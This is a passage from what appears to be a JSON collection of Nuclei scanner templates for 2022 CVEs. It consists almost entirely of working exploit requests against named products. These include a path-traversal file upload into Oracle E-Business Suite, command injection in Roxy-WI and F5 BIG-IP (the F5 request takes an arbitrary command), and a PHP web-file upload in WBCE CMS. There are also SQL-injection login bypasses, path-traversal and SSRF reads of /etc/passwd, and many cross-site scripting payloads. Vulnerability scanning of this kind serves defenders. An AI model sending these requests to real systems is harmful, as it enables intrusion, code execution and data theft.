name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(header, 'wordpress_')","contains(header, 'Location')"],"condition":"and"}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3869","info":{"name":"Froxlor < 0.10.38.2. - HTML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The message to \"\"><h2>TEST</h2>\" failed"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47075","info":{"name":"Smart Office Web 20.28 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ExportReportingManager.aspx"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/CSV\")","contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")"],"condition":"and"}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34534","info":{"name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/moduleInformation"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"name\\\":\", \"cloudHost\\\":\", \"remoteAddresses\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1597","info":{"name":"WordPress WPQA <5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\nContent-Type: application/x-www-form-urlencoded\n\nuser_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{redirect_to}}","\"success\":1"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code 